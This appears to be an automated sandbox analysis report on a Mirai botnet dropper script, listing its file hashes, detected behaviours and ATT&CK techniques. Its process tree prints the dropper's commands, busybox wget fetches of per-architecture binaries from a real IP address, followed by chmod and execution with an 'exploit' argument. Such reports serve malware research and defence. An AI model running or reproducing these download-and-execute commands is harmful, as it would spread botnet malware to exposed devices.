Analysis
-
max time kernel
125s -
max time network
160s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
18-02-2025 03:33
General
-
Target
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
-
Size
1KB
-
MD5
d011eee1c3ee60b1a1db3ae1e9e65ad6
-
SHA1
18f4cee16484157375f8bbcf21acca220a258d66
-
SHA256
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa
-
SHA512
ed73548c60e65449f31d4bc5ca644d2f59e72d0843a24b3236707338fbed8e26ed608897d0c5a26a971357e7d28b92a9ecb6d8d76d5f7d55e93bf0aa3dd3f6ac
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
Contacts a large (171175) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 2 IoCs
-
Executes dropped EXE 3 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Renames itself 2 IoCs
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 40 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 2 IoCs
-
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh/tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh1⤵
- Executes dropped EXE
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm -O jklarm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm./jklarm exploit2⤵
- Deletes itself
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm5./jklarm5 exploit2⤵
- Deletes itself
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm6./jklarm6 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm7 -O jklarm72⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm7./jklarm7 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklm68k -O jklm68k2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklm68k./jklm68k exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklmips -O jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmips./jklmips exploit2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklmpsl -O jklmpsl2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmpsl./jklmpsl exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklppc -O jklppc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklppc./jklppc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklsh4 -O jklsh42⤵
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/jklsh4./jklsh4 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklspc -O jklspc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklspc./jklspc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklx86 -O jklx862⤵
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
-
-
/tmp/jklx86./jklx86 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarc -O jklarc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarc./jklarc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD560323049a9468c264a9535600a053b6e
SHA1960ec393b1590fee232414d8d8f279b189573b6f
SHA2563ac4757c406bac2bedd2771c5c137607e2788099782ca939cb40c32aa2c71343
SHA512e1e33d7bf40b34e4a90a88b2ada4822dc150ae705ae118f2a169f1dc427a4bad4fcc6a0e3e668483024395ae9005d2bef1ac82952774b359063dbc6f32e44954
-
Filesize
54KB
MD5368f814e3fcc026df077492406916cfb
SHA194a499401b79d75a6c1df3eb205dc44057425f5b
SHA2564cb919fe578f5a95e86157987898bb2959019260992578f42e7abd79f3d864ce
SHA512e334932543ea5bead5ea96f13191f967e63893b92ffa2fe6793afe5d39615f46c2b62ab4ff8846f78cffeb32dd51ae6a88ba36dd59cab8da75a1cbd0f1b842cc
-
Filesize
65KB
MD53efe981dfb09404a90020f31b91a0d99
SHA175dad217f8faab13473fa87f1f90cfab16646e67
SHA256b0200c4648356ccc6af1711e1673c133c8f785611b10d49f925958507bb8b213
SHA5126f5068a4d9fa7e6db711cb6207a3316a24d58d68e6996e211d6a10ac5eee3b67adbd8677d7f4061eac2476b5596c9c767055ab3a19bcf569137c7ca3ed8177fc